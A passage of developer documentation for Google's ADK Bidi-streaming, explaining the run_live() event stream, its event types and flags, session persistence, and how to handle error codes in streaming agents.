In this part, you learned how `LiveRequestQueue` provides a unified interface for sending messages to ADK streaming agents within an async event loop. We covered the `LiveRequest` message model and explored how to send different message types: text content via `send_content()`, audio/video blobs via `send_realtime()`, activity signals for manual turn control, and control signals for graceful termination via `close()`. You also learned best practices for async queue management, creating queues in async context, resource cleanup, and message ordering. You now understand how to use `LiveRequestQueue` as the upstream communication channel in your Bidi-streaming applications, enabling users to send messages concurrently while receiving agent responses. Next, you'll learn how to handle the downstream flow: processing the events that agents generate in response to these messages.

______________________________________________________________________

← [Previous: Part 1: Introduction to ADK Bidi-streaming](https://google.github.io/adk-docs/streaming/dev-guide/part1/index.md) | [Next: Part 3: Event Handling with run_live()](https://google.github.io/adk-docs/streaming/dev-guide/part3/index.md) →

# Part 3: Event handling with run_live()

The `run_live()` method is ADK's primary entry point for streaming conversations, implementing an async generator that yields events as the conversation unfolds. This part focuses on understanding and handling these events, the core communication mechanism that enables real-time interaction between your application, users, and AI models.
You'll learn how to process different event types (text, audio, transcriptions, tool calls), manage conversation flow with interruption and turn completion signals, serialize events for network transport, and leverage ADK's automatic tool execution. Understanding event handling is essential for building responsive streaming applications that feel natural and real-time to users.

Async Context Required

All `run_live()` code requires async context. See [Part 1: FastAPI Application Example](https://google.github.io/adk-docs/streaming/dev-guide/part1/#fastapi-application-example) for details and production examples.

## How run_live() Works

`run_live()` is an async generator that streams conversation events in real-time. It yields events immediately as they're generated, with no internal buffering, polling, or callbacks. Overall memory use depends on session persistence (e.g., in-memory vs database), making it suitable for both quick exchanges and extended sessions.

### Method Signature and Flow

**Usage:**

Source reference: [runners.py](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py)

```python
# The method signature reveals the thoughtful design
async def run_live(
    self,
    *,  # Keyword-only arguments
    user_id: Optional[str] = None,  # User identification (required unless session provided)
    session_id: Optional[str] = None,  # Session tracking (required unless session provided)
    live_request_queue: LiveRequestQueue,  # The bidirectional communication channel
    run_config: Optional[RunConfig] = None,  # Streaming behavior configuration
    session: Optional[Session] = None,  # Deprecated: use user_id and session_id instead
) -> AsyncGenerator[Event, None]:  # Generator yielding conversation events
```

As the signature shows, every streaming conversation needs identity (`user_id`), continuity (`session_id`), communication (`live_request_queue`), and configuration (`run_config`).
The return type, an async generator of Events, promises real-time delivery without overwhelming system resources.

```
sequenceDiagram
    participant Client
    participant Runner
    participant Agent
    participant LLMFlow
    participant Gemini

    Client->>Runner: runner.run_live(user_id, session_id, queue, config)
    Runner->>Agent: agent.run_live(context)
    Agent->>LLMFlow: _llm_flow.run_live(context)
    LLMFlow->>Gemini: Connect and stream

    loop Continuous Streaming
        Gemini-->>LLMFlow: LlmResponse
        LLMFlow-->>Agent: Event
        Agent-->>Runner: Event
        Runner-->>Client: Event (yield)
    end
```

### Basic Usage Pattern

The simplest way to consume events from `run_live()` is to iterate over the async generator with an `async for` loop:

Demo implementation: [main.py:225-233](https://github.com/google/adk-samples/blob/31847c0723fbf16ddf6eed411eb070d1c76afd1a/python/agents/bidi-demo/app/main.py#L225-L233)

```python
async for event in runner.run_live(
    user_id=user_id,
    session_id=session_id,
    live_request_queue=live_request_queue,
    run_config=run_config
):
    event_json = event.model_dump_json(exclude_none=True, by_alias=True)
    logger.debug(f"[SERVER] Event: {event_json}")
    await websocket.send_text(event_json)
```

Session Identifiers

Both `user_id` and `session_id` must match the identifiers you used when creating the session via `SessionService.create_session()`. These can be any string values based on your application's needs (e.g., UUIDs, email addresses, custom tokens). See [Part 1: Get or Create Session](https://google.github.io/adk-docs/streaming/dev-guide/part1/#get-or-create-session) for detailed guidance on session identifiers.

### Connection Lifecycle in run_live()

The `run_live()` method manages the underlying Live API connection lifecycle automatically:

**Connection States:**

1. **Initialization**: Connection established when `run_live()` is called
1. **Active Streaming**: Bidirectional communication via `LiveRequestQueue` (upstream to the model) and `run_live()` (downstream from the model)
1. **Graceful Closure**: Connection closes when `LiveRequestQueue.close()` is called
1. **Error Recovery**: ADK supports transparent session resumption; enable via `RunConfig.session_resumption` to handle transient failures. See [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption) for details.

#### What run_live() Yields

The `run_live()` method yields a stream of `Event` objects in real-time as the agent processes user input and generates responses. Understanding the different event types helps you build responsive UIs that handle text, audio, transcriptions, tool calls, metadata, and errors appropriately. Each event type is explained in detail in the sections below.

| Event Type | Description |
| --- | --- |
| **[Text Events](#text-events)** | Model's text responses when using `response_modalities=["TEXT"]`; includes `partial`, `turn_complete`, and `interrupted` flags for streaming UI management |
| **[Audio Events with Inline Data](#audio-events)** | Raw audio bytes (`inline_data`) streamed in real-time when using `response_modalities=["AUDIO"]`; ephemeral (not persisted to session) |
| **[Audio Events with File Data](#audio-events-with-file-data)** | Audio aggregated into files and stored in artifacts; contains `file_data` references instead of raw bytes; can be persisted to session history |
| **[Metadata Events](#metadata-events)** | Token usage information (`prompt_token_count`, `candidates_token_count`, `total_token_count`) for cost monitoring and quota tracking |
| **[Transcription Events](#transcription-events)** | Speech-to-text for user input (`input_transcription`) and model output (`output_transcription`) when transcription is enabled in `RunConfig` |
| **[Tool Call Events](#tool-call-events)** | Function call requests from the model; ADK handles execution automatically |
| **[Error Events](#error-events)** | Model errors and connection issues with `error_code` and `error_message` fields |

Source Reference

See the complete event type handling implementation in [`runners.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py)

#### When run_live() Exits

The `run_live()` event loop can exit under various conditions. Understanding these exit scenarios is crucial for proper resource cleanup and error handling:

| Exit Condition | Trigger | Graceful? | Description |
| --- | --- | --- | --- |
| **Manual close** | `live_request_queue.close()` | ✅ Yes | User explicitly closes the queue, sending `LiveRequest(close=True)` signal |
| **All agents complete** | Last agent in SequentialAgent calls `task_completed()` | ✅ Yes | After all sequential agents finish their tasks |
| **Session timeout** | Live API duration limit reached | ⚠️ Connection closed | Session exceeds maximum duration (see limits below) |
| **Early exit** | `end_invocation` flag set | ✅ Yes | Set during preprocessing or by tools/callbacks to terminate early |
| **Empty event** | Queue closure signal | ✅ Yes | Internal signal indicating event stream has ended |
| **Errors** | Connection errors, exceptions | ❌ No | Unhandled exceptions or connection failures |

SequentialAgent Behavior

When using `SequentialAgent`, the `task_completed()` function does NOT exit your application's `run_live()` loop. It only signals the end of the current agent's work, triggering a seamless transition to the next agent in the sequence. Your event loop continues receiving events from subsequent agents. The loop only exits when the **last** agent in the sequence completes.
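Because the stream can end either gracefully or through an exception, it helps to structure the consuming loop so that cleanup runs in both cases. The following is a self-contained sketch under stated assumptions: `fake_run_live()` and `FakeQueue` are hypothetical stand-ins for `runner.run_live()` and `LiveRequestQueue`, used only so the control flow can run without ADK installed.

```python
import asyncio
from typing import AsyncGenerator, List


class FakeQueue:
    """Hypothetical stand-in for LiveRequestQueue; records whether close() ran."""

    def __init__(self) -> None:
        self.closed = False

    def close(self) -> None:
        self.closed = True


async def fake_run_live(events: List[str], fail: bool = False) -> AsyncGenerator[str, None]:
    """Hypothetical stand-in for runner.run_live(): yields events, then ends or raises."""
    for event in events:
        yield event
    if fail:
        raise ConnectionError("simulated connection failure")


async def consume(events: List[str], fail: bool = False):
    queue = FakeQueue()
    seen: List[str] = []
    outcome = "graceful"
    try:
        async for event in fake_run_live(events, fail=fail):
            seen.append(event)  # a real app would forward the event to the client
    except ConnectionError:
        outcome = "error"  # non-graceful exit: log and report
    finally:
        queue.close()  # always release the upstream queue
    return seen, outcome, queue.closed


graceful = asyncio.run(consume(["a", "b"]))
failed = asyncio.run(consume(["a"], fail=True))
```

In both runs the queue ends up closed; only the reported outcome differs, which is the distinction the table above draws between graceful and non-graceful exits.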
Learn More

For session resumption and connection recovery details, see [Part 4: Live API Session Resumption](https://google.github.io/adk-docs/streaming/dev-guide/part4/#live-api-session-resumption). For multi-agent workflows, see [Best Practices for Multi-Agent Workflows](#best-practices-for-multi-agent-workflows).

#### Events Saved to ADK `Session`

Not all events yielded by `run_live()` are persisted to the ADK `Session`. When `run_live()` exits, only certain events are saved to the session while others remain ephemeral. Understanding which events are saved versus which are ephemeral is crucial for applications that use session persistence, resumption, or need to review conversation history.

Source Reference

See session event persistence logic in [`runners.py`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/runners.py)

**Events Saved to the ADK `Session`:**

These events are persisted to the ADK `Session` and available in session history:

- **Audio Events with File Data**: Saved to ADK `Session` only if `RunConfig.save_live_blob` is `True`; audio data is aggregated into files in artifacts with `file_data` references
- **Usage Metadata Events**: Always saved to track token consumption across the ADK `Session`
- **Non-Partial Transcription Events**: Final transcriptions are saved; partial transcriptions are not persisted
- **Function Call and Response Events**: Always saved to maintain tool execution history
- **Other Control Events**: Most control events (e.g., `turn_complete`, `finish_reason`) are saved

**Events NOT Saved to the ADK `Session`:**

These events are ephemeral and only yielded to callers during active streaming:

- **Audio Events with Inline Data**: Raw audio `Blob` data in `inline_data` is never saved to the ADK `Session` (only yielded for real-time playback)
- **Partial Transcription Events**: Only yielded for real-time display; final transcriptions are saved

Audio Persistence

To save audio conversations to the ADK `Session` for review or resumption, enable `RunConfig.save_live_blob = True`. This persists audio streams to artifacts. See [Part 4: save_live_blob](https://google.github.io/adk-docs/streaming/dev-guide/part4/#save_live_blob) for configuration details.

## Understanding Events

Events are the core communication mechanism in ADK's Bidi-streaming system. This section explores the complete lifecycle of events: how they're generated through multiple pipeline layers, the concurrent processing patterns that enable true real-time interaction, and the practical handling of interruptions and turn completion. You'll learn about event types (text, audio, transcriptions, tool calls), serialization strategies for network transport, and the connection lifecycle that manages streaming sessions across both Gemini Live API and Vertex AI Live API platforms.

### The Event Class

ADK's `Event` class is a Pydantic model that represents all communication in a streaming conversation. It extends `LlmResponse` and serves as the unified container for model responses, user input, transcriptions, and control signals.
Source Reference See Event class implementation in [`event.py:30-128`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/events/event.py#L30-L128) and [`llm_response.py:28-200`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L28-L200) #### Key Fields **Essential for all applications:** - `content`: Contains text, audio, or function calls as `Content.parts` - `author`: Identifies who created the event (`"user"` or agent name) - `partial`: Distinguishes incremental chunks from complete text - `turn_complete`: Signals when to enable user input again - `interrupted`: Indicates when to stop rendering current output **For voice/audio applications:** - `input_transcription`: User's spoken words (when enabled in `RunConfig`) - `output_transcription`: Model's spoken words (when enabled in `RunConfig`) - `content.parts[].inline_data`: Audio data for playback **For tool execution:** - `content.parts[].function_call`: Model's tool invocation requests - `content.parts[].function_response`: Tool execution results - `long_running_tool_ids`: Track async tool execution **For debugging and diagnostics:** - `usage_metadata`: Token counts and billing information - `cache_metadata`: Context cache hit/miss statistics - `finish_reason`: Why the model stopped generating (e.g., STOP, MAX_TOKENS, SAFETY) - `error_code` / `error_message`: Failure diagnostics Author Semantics Transcription events have author `"user"`; model responses/events use the agent's name as `author` (not `"model"`). See [Event Authorship](#event-authorship) for details. #### Understanding Event Identity Events have two important ID fields: - **`event.id`**: Unique identifier for this specific event (format: UUID). Each event gets a new ID, even partial text chunks. - **`event.invocation_id`**: Shared identifier for all events in the current invocation (format: `"e-" + UUID`). 
In `run_live()`, all events from a single streaming session share the same invocation_id. (See [InvocationContext](#invocationcontext-the-execution-state-container) for more about invocations) **Usage:** ```python # All events in this streaming session will have the same invocation_id async for event in runner.run_live(...): print(f"Event ID: {event.id}") # Unique per event print(f"Invocation ID: {event.invocation_id}") # Same for all events in session ``` **Use cases:** - **event.id**: Track individual events in logs, deduplicate events - **event.invocation_id**: Group events by conversation session, filter session-specific events ### Event Authorship In live streaming mode, the `Event.author` field follows special semantics to maintain conversation clarity: **Model responses**: Authored by the **agent name** (e.g., `"my_agent"`), not the literal string `"model"` - This enables multi-agent scenarios where you need to track which agent generated the response - Example: `Event(author="customer_service_agent", content=...)` **User transcriptions**: Authored as `"user"` when the event contains transcribed user audio **How it works**: 1. Gemini Live API returns user audio transcriptions with `content.role == 'user'` 1. ADK's `get_author_for_event()` function checks for this role marker 1. If `content.role == 'user'`, ADK sets `Event.author` to `"user"` 1. Otherwise, ADK sets `Event.author` to the agent name (e.g., `"my_agent"`) This transformation ensures that transcribed user input is correctly attributed to the user in your application's conversation history, even though it flows through the model's response stream. 
- Example: Input audio transcription → `Event(author="user", input_transcription=..., content.role="user")` **Why this matters**: - In multi-agent applications, you can filter events by agent: `events = [e for e in stream if e.author == "my_agent"]` - When displaying conversation history, use `event.author` to show who said what - Transcription events are correctly attributed to the user even though they flow through the model Source Reference See author attribution logic in [`base_llm_flow.py:292-326`](https://github.com/google/adk-python/blob/fd2c0f556b786417a9f6add744827b07e7a06b7d/src/google/adk/flows/llm_flows/base_llm_flow.py#L287-L321) ### Event Types and Handling ADK streams distinct event types through `runner.run_live()` to support different interaction modalities: text responses for traditional chat, audio chunks for voice output, transcriptions for accessibility and logging, and tool call notifications for function execution. Each event includes metadata flags (`partial`, `turn_complete`, `interrupted`) that control UI state transitions and enable natural, human-like conversation flows. Understanding how to recognize and handle these event types is essential for building responsive streaming applications. ### Text Events The most common event type, containing the model's text responses when you specify `response_modalities` in `RunConfig` to `["TEXT"]` mode: **Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: if event.content.parts[0].text: text = event.content.parts[0].text if not event.partial: # Your logic to update streaming display update_streaming_display(text) ``` #### Default Response Modality Behavior When `response_modalities` is not explicitly set (i.e., `None`), ADK automatically defaults to `["AUDIO"]` mode at the start of `run_live()`. 
This means:

- **If you provide no `RunConfig`**: Defaults to `["AUDIO"]`
- **If you provide `RunConfig` without `response_modalities`**: Defaults to `["AUDIO"]`
- **If you explicitly set `response_modalities`**: Uses your setting (no default applied)

**Why this default exists**: Some native audio models require the response modality to be explicitly set. To ensure compatibility with all models, ADK defaults to `["AUDIO"]`.

**For text-only applications**: Always explicitly set `response_modalities=["TEXT"]` in your `RunConfig` to avoid receiving unexpected audio events.

**Example:**

```python
from google.adk.agents.run_config import RunConfig, StreamingMode

# Explicit text mode
run_config = RunConfig(
    response_modalities=["TEXT"],
    streaming_mode=StreamingMode.BIDI
)
```

**Key Event Flags:**

These flags help you manage streaming text display and conversation flow in your UI:

- `event.partial`: `True` for incremental text chunks during streaming; `False` for complete merged text
- `event.turn_complete`: `True` when the model has finished its complete response
- `event.interrupted`: `True` when the user interrupted the model's response

Learn More

For detailed guidance on using the `partial`, `turn_complete`, and `interrupted` flags to manage conversation flow and UI state, see [Handling Text Events](#handling-text-events).
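As a rough illustration of how the three flags can drive UI state, the sketch below replays a list of events through a small state holder. `FakeEvent`, `TurnState`, and `replay` are hypothetical names introduced only for this example. `FakeEvent` is a simplified stand-in for ADK's `Event` that exposes the text directly instead of through `content.parts`, so treat it as a sketch under those assumptions rather than ADK's own handling.

```python
from dataclasses import dataclass, field
from typing import List, Optional


@dataclass
class FakeEvent:
    """Hypothetical stand-in for an ADK Event; models only the flag-related fields."""
    text: Optional[str] = None
    partial: bool = False
    turn_complete: bool = False
    interrupted: bool = False


@dataclass
class TurnState:
    """Hypothetical UI state derived from the event flags."""
    streaming_text: str = ""  # text shown while chunks are still arriving
    final_messages: List[str] = field(default_factory=list)
    input_enabled: bool = True

    def apply(self, event: FakeEvent) -> None:
        if event.text:
            # The model is responding, so hold user input until the turn ends.
            self.input_enabled = False
            if event.partial:
                # Incremental chunk: append to the in-progress display.
                self.streaming_text += event.text
            else:
                # Complete merged text: store it and reset the in-progress display.
                self.final_messages.append(event.text)
                self.streaming_text = ""
        if event.interrupted:
            # The user cut in: drop whatever was still being rendered.
            self.streaming_text = ""
        if event.turn_complete:
            # Turn boundary: the UI can accept input again.
            self.input_enabled = True


def replay(events: List[FakeEvent]) -> TurnState:
    """Apply events in order and return the resulting state."""
    state = TurnState()
    for event in events:
        state.apply(event)
    return state
```

In a real handler, the same branching would sit inside the `async for event in runner.run_live(...)` loop, reading text from `event.content.parts` instead of a flat `text` attribute.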
### Audio Events When `response_modalities` is configured to `["AUDIO"]` in your `RunConfig`, the model generates audio output instead of text, and you'll receive audio data in the event stream: **Configuration:** ```python # Configure RunConfig for audio responses run_config = RunConfig( response_modalities=["AUDIO"], streaming_mode=StreamingMode.BIDI ) # Audio arrives as inline_data in event.content.parts async for event in runner.run_live(..., run_config=run_config): if event.content and event.content.parts: part = event.content.parts[0] if part.inline_data: # Audio event structure: # part.inline_data.data: bytes (raw PCM audio) # part.inline_data.mime_type: str (e.g., "audio/pcm") audio_data = part.inline_data.data mime_type = part.inline_data.mime_type print(f"Received {len(audio_data)} bytes of {mime_type}") # Your logic to play audio await play_audio(audio_data) ``` Learn More - **`response_modalities` controls how the model generates output**—you must choose either `["TEXT"]` for text responses or `["AUDIO"]` for audio responses per session. You cannot use both modalities simultaneously. See [Part 4: Response Modalities](https://google.github.io/adk-docs/streaming/dev-guide/part4/#response-modalities) for configuration details. - For comprehensive coverage of audio formats, sending/receiving audio, and audio processing flow, see [Part 5: How to Use Audio, Image and Video](https://google.github.io/adk-docs/streaming/dev-guide/part5/index.md). ### Audio Events with File Data When audio data is aggregated and saved as files in artifacts, ADK yields events containing `file_data` references instead of raw `inline_data`. This is useful for persisting audio to session history. 
Source Reference See audio file aggregation logic in [`audio_cache_manager.py:156-178`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/flows/llm_flows/audio_cache_manager.py#L156-L178) **Receiving Audio File References:** ```python async for event in runner.run_live( user_id=user_id, session_id=session_id, live_request_queue=queue, run_config=run_config ): if event.content and event.content.parts: for part in event.content.parts: if part.file_data: # Audio aggregated into a file saved in artifacts file_uri = part.file_data.file_uri mime_type = part.file_data.mime_type print(f"Audio file saved: {file_uri} ({mime_type})") # Retrieve audio file from artifact service for playback ``` **File Data vs Inline Data:** - **Inline Data** (`part.inline_data`): Raw audio bytes streamed in real-time; ephemeral and not saved to session - **File Data** (`part.file_data`): Reference to audio file stored in artifacts; can be persisted to session history Both input and output audio data are aggregated into audio files and saved in the artifact service. The file reference is included in the event as `file_data`, allowing you to retrieve the audio later. Session Persistence To save audio events with file data to session history, enable `RunConfig.save_live_blob = True`. This allows audio conversations to be reviewed or replayed from persisted sessions. ### Metadata Events Usage metadata events contain token usage information for monitoring costs and quota consumption. The `run_live()` method yields these events separately from content events. 
Source Reference

See usage metadata structure in [`llm_response.py:105`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L105)

**Accessing Token Usage:**

```python
# Running total; must be initialized before the loop
total_tokens = 0

async for event in runner.run_live(
    user_id=user_id,
    session_id=session_id,
    live_request_queue=queue,
    run_config=run_config
):
    if event.usage_metadata:
        print(f"Prompt tokens: {event.usage_metadata.prompt_token_count}")
        print(f"Response tokens: {event.usage_metadata.candidates_token_count}")
        print(f"Total tokens: {event.usage_metadata.total_token_count}")

        # Track cumulative usage across the session
        total_tokens += event.usage_metadata.total_token_count or 0
```

**Available Metadata Fields:**

- `prompt_token_count`: Number of tokens in the input (prompt and context)
- `candidates_token_count`: Number of tokens in the model's response
- `total_token_count`: Sum of prompt and response tokens
- `cached_content_token_count`: Number of tokens served from cache (when using context caching)

Cost Monitoring

Usage metadata events allow real-time cost tracking during streaming sessions. You can implement quota limits, display usage to users, or log metrics for billing and analytics.

### Transcription Events

When transcription is enabled in `RunConfig`, you receive transcriptions as separate events:

**Usage:**

```python
async for event in runner.run_live(...):
    # User's spoken words (when input_audio_transcription enabled)
    if event.input_transcription:
        # Your logic to display user transcription
        display_user_transcription(event.input_transcription)

    # Model's spoken words (when output_audio_transcription enabled)
    if event.output_transcription:
        # Your logic to display model transcription
        display_model_transcription(event.output_transcription)
```

These events enable accessibility features and conversation logging without separate transcription services.
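For conversation logging, one possible approach is to keep only final transcriptions and tag each with its speaker. The sketch below is illustrative only: `FakeTranscription`, `FakeTranscriptEvent`, and `build_transcript` are hypothetical names, and the `text` and `finished` attributes are assumptions about the shape of the transcription payload that you should verify against the ADK version you use.

```python
from dataclasses import dataclass
from typing import List, Optional, Tuple


@dataclass
class FakeTranscription:
    """Hypothetical stand-in for a transcription payload."""
    text: str
    finished: bool = False  # assumed flag marking a final (non-partial) transcription


@dataclass
class FakeTranscriptEvent:
    """Hypothetical stand-in for an ADK Event carrying transcriptions."""
    input_transcription: Optional[FakeTranscription] = None
    output_transcription: Optional[FakeTranscription] = None


def build_transcript(events: List[FakeTranscriptEvent]) -> List[Tuple[str, str]]:
    """Collect (speaker, text) pairs from finished transcriptions only."""
    log: List[Tuple[str, str]] = []
    for event in events:
        candidates = (
            ("user", event.input_transcription),
            ("model", event.output_transcription),
        )
        for speaker, transcription in candidates:
            if transcription is None or not transcription.finished:
                continue  # skip missing or still-partial transcriptions
            text = transcription.text.strip()
            if text:
                log.append((speaker, text))
    return log
```

Partial transcriptions can still be shown live in the UI; this helper simply ignores them so the stored log contains one entry per completed utterance.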
Learn More For details on enabling transcription in `RunConfig` and understanding transcription delivery, see [Part 5: Audio Transcription](https://google.github.io/adk-docs/streaming/dev-guide/part5/#audio-transcription). ### Tool Call Events When the model requests tool execution: **Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: for part in event.content.parts: if part.function_call: # Model is requesting a tool execution tool_name = part.function_call.name tool_args = part.function_call.args # ADK handles execution automatically ``` ADK processes tool calls automatically—you typically don't need to handle these directly unless implementing custom tool execution logic. Learn More For details on how ADK automatically executes tools, handles function responses, and supports long-running and streaming tools, see [Automatic Tool Execution in run_live()](#automatic-tool-execution-in-run_live). ### Error Events Production applications need robust error handling to gracefully handle model errors and connection issues. 
ADK surfaces errors through the `error_code` and `error_message` fields: **Usage:** ```python import logging logger = logging.getLogger(__name__) try: async for event in runner.run_live(...): # Handle errors from the model or connection if event.error_code: logger.error(f"Model error: {event.error_code} - {event.error_message}") # Send error notification to client await websocket.send_json({ "type": "error", "code": event.error_code, "message": event.error_message }) # Decide whether to continue or break based on error severity if event.error_code in ["SAFETY", "PROHIBITED_CONTENT", "BLOCKLIST"]: # Content policy violations - usually cannot retry break # Terminal error - exit loop elif event.error_code == "MAX_TOKENS": # Token limit reached - may need to adjust configuration break # For other errors, you might continue or implement retry logic continue # Transient error - keep processing # Normal event processing only if no error if event.content and event.content.parts: # ... handle content pass finally: queue.close() # Always cleanup connection ``` Note The above example shows the basic structure for checking `error_code` and `error_message`. For production-ready error handling with user notifications, retry logic, and context logging, see the real-world scenarios below. **When to use `break` vs `continue`:** The key decision is: *Can the model's response continue meaningfully?* **Scenario 1: Content Policy Violation (Use `break`)** You're building a customer support chatbot. A user asks an inappropriate question that triggers a SAFETY filter: **Example:** ```python if event.error_code in ["SAFETY", "PROHIBITED_CONTENT", "BLOCKLIST"]: # Model has stopped generating - continuation is impossible await websocket.send_json({ "type": "error", "message": "I can't help with that request. Please ask something else." }) break # Exit loop - model won't send more events for this turn ``` **Why `break`?** The model has terminated its response. 
No more events will come for this turn. Continuing would just waste resources waiting for events that won't arrive. ______________________________________________________________________ **Scenario 2: Network Hiccup During Streaming (Use `continue`)** You're building a voice transcription service. Midway through transcribing, there's a brief network glitch: **Example:** ```python if event.error_code == "UNAVAILABLE": # Temporary network issue logger.warning(f"Network hiccup: {event.error_message}") # Don't notify user for brief transient issues that may self-resolve continue # Keep listening - model may recover and continue ``` **Why `continue`?** This is a transient error. The connection might recover, and the model may continue streaming the transcription. Breaking would prematurely end a potentially recoverable stream. User Notifications For brief transient errors (lasting \<1 second), don't notify the user—they won't notice the hiccup. But if the error persists or impacts the user experience (e.g., streaming pauses for >3 seconds), notify them gracefully: "Experiencing connection issues, retrying..." ______________________________________________________________________ **Scenario 3: Token Limit Reached (Use `break`)** You're generating a long-form article and hit the maximum token limit: **Example:** ```python if event.error_code == "MAX_TOKENS": # Model has reached output limit await websocket.send_json({ "type": "complete", "message": "Response reached maximum length", "truncated": True }) break # Model has finished - no more tokens will be generated ``` **Why `break`?** The model has reached its output limit and stopped. Continuing won't yield more tokens. 
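The scenarios above can be folded into one small helper so the streaming loop stays readable. This is a minimal sketch, not part of ADK: `Action`, `TERMINAL_CODES`, and `classify_error` are hypothetical names, and the set of terminal codes simply mirrors the codes used in the examples above.

```python
from enum import Enum
from typing import Optional


class Action(Enum):
    """Hypothetical loop actions for an error event."""
    BREAK = "break"
    CONTINUE = "continue"


# Codes after which the model sends no further events for the turn.
TERMINAL_CODES = frozenset({"SAFETY", "PROHIBITED_CONTENT", "BLOCKLIST", "MAX_TOKENS"})


def classify_error(error_code: Optional[str]) -> Optional[Action]:
    """Map an error code to a loop action; returns None when there is no error."""
    if not error_code:
        return None
    if error_code in TERMINAL_CODES:
        return Action.BREAK
    # Transient codes such as UNAVAILABLE, and anything unrecognized: keep listening.
    return Action.CONTINUE
```

Inside the loop you would call `classify_error(event.error_code)`, `break` on `Action.BREAK`, and log then `continue` on `Action.CONTINUE`, keeping the `finally` cleanup unchanged.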
______________________________________________________________________ **Scenario 4: Rate Limit with Retry Logic (Use `continue` with backoff)** You're running a high-traffic application that occasionally hits rate limits: **Example:** ```python retry_count = 0 max_retries = 3 async for event in runner.run_live(...): if event.error_code == "RESOURCE_EXHAUSTED": retry_count += 1 if retry_count > max_retries: logger.error("Max retries exceeded") break # Give up after multiple failures # Wait and retry await asyncio.sleep(2 ** retry_count) # Exponential backoff continue # Keep listening - rate limit may clear # Reset counter on successful event retry_count = 0 ``` **Why `continue` (initially)?** Rate limits are often temporary. With exponential backoff, the stream may recover. But after multiple failures, `break` to avoid infinite waiting. ______________________________________________________________________ **Decision Framework:** | Error Type | Action | Reason | | ---------------------------------- | --------------------------- | ------------------------------- | | `SAFETY`, `PROHIBITED_CONTENT` | `break` | Model terminated response | | `MAX_TOKENS` | `break` | Model finished generating | | `UNAVAILABLE`, `DEADLINE_EXCEEDED` | `continue` | Transient network/timeout issue | | `RESOURCE_EXHAUSTED` (rate limit) | `continue` with retry logic | May recover after brief wait | | Unknown errors | `continue` (with logging) | Err on side of caution | **Critical: Always use `finally` for cleanup** **Usage:** ```python try: async for event in runner.run_live(...): # ... error handling ... finally: queue.close() # Cleanup runs whether you break or finish normally ``` Whether you `break` or the loop finishes naturally, `finally` ensures the connection closes properly. **Error Code Reference:** ADK error codes come from the underlying Gemini API. 
Here are the most common error codes you'll encounter: | Error Code | Category | Description | Recommended Action | | -------------------- | -------------- | ------------------------------------ | ------------------------------------------- | | `SAFETY` | Content Policy | Content violates safety policies | `break` - Inform user, log incident | | `PROHIBITED_CONTENT` | Content Policy | Content contains prohibited material | `break` - Show policy violation message | | `BLOCKLIST` | Content Policy | Content matches blocklist | `break` - Alert user, don't retry | | `MAX_TOKENS` | Limits | Output reached maximum token limit | `break` - Truncate gracefully, summarize | | `RESOURCE_EXHAUSTED` | Rate Limiting | Quota or rate limit exceeded | `continue` with backoff - Retry after delay | | `UNAVAILABLE` | Transient | Service temporarily unavailable | `continue` - Retry, may self-resolve | | `DEADLINE_EXCEEDED` | Transient | Request timeout exceeded | `continue` - Consider retry with backoff | | `CANCELLED` | Client | Client cancelled the request | `break` - Clean up resources | | `UNKNOWN` | System | Unspecified error occurred | `continue` with logging - Log for analysis | For complete error code listings and descriptions, refer to the official documentation: Official Documentation - **FinishReason** (when model stops generating tokens): [Google AI for Developers](https://ai.google.dev/api/python/google/ai/generativelanguage/Candidate/FinishReason) | [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/model-reference/gemini) - **BlockedReason** (when prompts are blocked by content filters): [Google AI for Developers](https://ai.google.dev/api/python/google/ai/generativelanguage/GenerateContentResponse/PromptFeedback/BlockReason) | [Vertex AI](https://cloud.google.com/vertex-ai/generative-ai/docs/multimodal/configure-safety-attributes) - **ADK Implementation**: 
[`llm_response.py:145-200`](https://github.com/google/adk-python/blob/29c1115959b0084ac1169748863b35323da3cf50/src/google/adk/models/llm_response.py#L145-L200) **Best practices for error handling:** - **Always check for errors first**: Process `error_code` before handling content to avoid processing invalid events - **Log errors with context**: Include session_id and user_id in error logs for debugging - **Categorize errors**: Distinguish between retryable errors (transient failures) and terminal errors (content policy violations) - **Notify users gracefully**: Show user-friendly error messages instead of raw error codes - **Implement retry logic**: For transient errors, consider automatic retry with exponential backoff - **Monitor error rates**: Track error types and frequencies to identify systemic issues - **Handle content policy errors**: For `SAFETY`, `PROHIBITED_CONTENT`, and `BLOCKLIST` errors, inform users that their content violates policies ## Handling Text Events Understanding the `partial`, `interrupted`, and `turn_complete` flags is essential for building responsive streaming UIs. These flags enable you to provide real-time feedback during streaming, handle user interruptions gracefully, and detect conversation boundaries for proper state management. ### Handling `partial` This flag helps you distinguish between incremental text chunks and complete merged text, enabling smooth streaming displays with proper final confirmation. 
**Usage:** ```python async for event in runner.run_live(...): if event.content and event.content.parts: if event.content.parts[0].text: text = event.content.parts[0].text if event.partial: # Your streaming UI update logic here update_streaming_display(text) else: # Your complete message display logic here display_complete_message(text) ``` **`partial` Flag Semantics:** - `partial=True`: The text in this event is **incremental**—it contains ONLY the new text since the last event - `partial=False`: The text in this event is **complete**—it contains the full merged text for this response segment Note The `partial` flag is only meaningful for text content (`event.content.parts[].text`). For other content types: - **Audio events**: Each audio chunk in `inline_data` is independent (no merging occurs) - **Tool calls**: Function calls and responses are always complete (partial doesn't apply) - **Transcriptions**: Transcription events are always complete when yielded **Example Stream:** ```text Event 1: partial=True, text="Hello", turn_complete=False Event 2: partial=True, text=" world", turn_complete=False Event 3: partial=False, text="Hello world", turn_complete=False Event 4: partial=False, text="", turn_complete=True # Turn done ``` **Important timing relationships**: - `partial=False` can occur **multiple times** in a turn (e.g., after each sentence) - `turn_complete=True` occurs 